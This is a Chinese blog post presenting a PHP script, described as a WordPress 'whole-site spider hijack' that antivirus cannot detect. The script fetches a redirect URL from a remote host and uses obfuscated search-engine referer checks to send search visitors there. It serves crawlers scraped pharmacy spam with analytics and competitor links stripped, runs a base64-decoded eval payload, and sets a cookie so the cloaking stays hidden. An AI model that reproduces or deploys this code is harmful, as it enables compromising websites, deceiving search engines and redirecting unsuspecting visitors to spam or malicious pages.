富贵长生天做主由不得我
钢骨正气我做主由不得天

来自国外的wp 全站蜘蛛劫持,目前没有任何杀软能扫到

<?php
error_reporting(0);

$fromsite = “https://www.wphealthcarenews.com/what-is-the-safest-drug-for-erectile-dysfunction/”;
$indexkey=””;
$mysite = “https://www.xxxxxx.hk/”;
$filename = “”;
$url = empty($_GET[‘man’])?””:$_GET[‘man’];
$qstr = $filename.”?man=”;

$ch = curl_init();
$timeout = 2;
curl_setopt ($ch, CURLOPT_URL, “http://5.bingstyle.com/heiwu.php”);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$jturl = curl_exec($ch);
$httpCode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if(empty($jturl) || $httpCode !== 200){
$jturl = “http://xxxxx.com/7c8fc0c1-96cc-452d-9869-6a71368f6021”;
}

function getHtml($url)
{
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)”);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_NOBODY, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$content = curl_exec($ch);
curl_close($ch);
if(empty($content)){
$content=file_get_contents($url);
}
return $content;
}

function chref($crefs)
{
$truecref= str_replace(“x”,””,”bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh|duxckxduxckxgxo|wxoxw”);
if(preg_match(“/$truecref/i”,$crefs)){
return true;
}else{
return false;
}
}
$htprefs = strtolower($_SERVER/*;*/[/*;*/’HTTP_REFERER’/*;*/]);
if(chref($htprefs) && empty($_COOKIE[‘haircki’])){
if(!$_SERVER[“QUERY_STRING”] && $_SERVER[“REQUEST_URI”]==’/’){
header(“location: “.$jturl.$indexkey);
exit;
}
if(!empty($url)){
header(“location: “.$jturl);
exit;

}
if(chref($htprefs) && empty($_GET[‘man’])){
header(“location: “.$jturl);
exit;
}
}

preg_match(“/(http|https):\/\/([\s\S]*?)\//i”,$fromsite, $matches);
if(!empty($url))
{
$fromsite=$matches[0];
}
$content = getHtml($fromsite.$url);
$fromsite=$matches[0];
$repstr = $mysite.$qstr;
$fromsiteurl =str_replace(array(“https://”,”http://”),””,$fromsite);
$content = str_replace(“http://”.$fromsiteurl,$repstr,$content);
$content = str_replace(“https://”.$fromsiteurl,$repstr,$content);

$content = str_replace(“src=\””.$repstr,”src=\””.$fromsite,$content);

//$content = str_replace(“href=\””,”href=\””.$repstr,$content);
$content = str_replace($repstr.$repstr,$repstr,$content);
$content = str_replace($repstr.”static”,$fromsite.”static”,$content);
$content = str_replace($repstr.”skin”,$fromsite.”skin”,$content);
$content = str_replace($repstr.”js”,$fromsite.”js”,$content);
$content = str_replace($repstr.”/css”,$fromsite.”css”,$content);
$content = str_replace($repstr.”media”,$fromsite.”media”,$content);
$content = str_replace($repstr.”\””,$mysite1.”\””,$content);
$content = str_replace($repstr.”/\””,$mysite1.”\””,$content);
$content = preg_replace(“#(src|href)=(\”|’)http://(www\.)?”.str_replace(“.”,”\.”,$fromsite).”/(.*?)(\”|’)#”, “$1=\””.$repstr.”$4\””, $content);
$content = preg_replace(“#(src|href)=(\”|’)(/|(?!http))(.*?)(\”|’)#”, “$1=\””.$repstr.”$4\””, $content);
$content = str_replace($repstr.$matches[0],$repstr,$content);
$content = str_ireplace(‘</head>’,'<meta name=”robots” content=”index,follow,noarchive,noodp” />’.chr(13).chr(10).'</head>’,$content);
$content = str_replace(“/js”,$fromsite.”js”,$content);
$content = str_replace(“/images”,$fromsite.”images”,$content);
$content = str_replace($repstr.$fromsite,$fromsite,$content);
$content = str_replace(“statcounter”,”sdf”,$content);
$content = str_replace(“ga(“,”sdfsdf”,$content);
$content = str_replace(“google-analytics.com”,”sdfsd”,$content);
$content = str_replace(“linezing.com”,”sdfsdf”,$content);
$content = str_replace(“comm100.com”,”sdfsdf”,$content);
$content = str_replace($repstr.”/”,$repstr,$content);
$content = preg_replace(“/bodynutrition|walgreens|superdrug|smore|buzzfeed|potencyup.com|amazon.com|health24|harvardhealth/i”, “Alpha XR”, $content);
$domain= str_replace(“www.”,””,$_SERVER[‘HTTP_HOST’]);
$content = preg_replace(“#href=(\”|’)(http|https)://(?!(www\.)?”.str_replace(“.”,”\.”,$domain).”)(.*?)(\”|’)#i”, “href=\”#\””, $content);
if(empty($url)){
$content = preg_replace(“#<link\srel=\”canonical\”\shref=\”(.*?)/>#”,””,$content);
$content = str_ireplace(“</title>”,”</title>\r\n<link rel=\”canonical\” href=\”{$mysite}\” />”,$content);}
eval/*sss*/(base64_decode(‘xxxxxxxxxxxxxx’));
if(cagt($spde)){
echo $links;
echo $content;
exit;
}
setcookie(‘haircki’,’haircooki’, time()+3600*24*100);
define(‘DISALLOW_FILE_EDIT’,true);
define(‘DISALLOW_FILE_MODS’,true);
?>

赞(1)
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《来自国外的wp 全站蜘蛛劫持,目前没有任何杀软能扫到》
文章链接:https://www.lolmm.cn/seo/621.html
本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。

评论 抢沙发

评论前必须登录!